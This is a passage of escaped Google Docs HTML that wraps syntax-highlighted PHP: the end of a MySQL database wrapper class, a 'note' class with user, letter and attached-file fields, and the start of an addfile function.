New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;echo&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $row[0];&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;array_push&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($res, $row[0]);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $res;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;fetch_arr&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;()&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_fetch_array&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;res);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;fetch_one&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;()&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;$res &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_fetch_row&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($this&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;-&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;res);&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;count&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;($res) &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&amp;gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; 0 ? $res[0] : &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;NULL&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;get_auto_incre&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;()&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;return&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;mysql_insert_id&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;}&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;};&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;$DB &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;=&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;new&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#a535ae;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;db&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;();&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;class&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;note&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;{&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;public&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; $user, $letter, $attached_file;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;&lt;br class=&quot;kix-line-break&quot;&gt;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#ff5600;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;function&lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#000000;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt; &lt;/span&gt;&lt;span style=&quot;font-size:10.5pt;font-family:'Courier New';color:#21439c;background-color:#ffffff;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;white-space:pre-wrap;&quot;&gt;addfile&lt;/span&gt;&lt;span 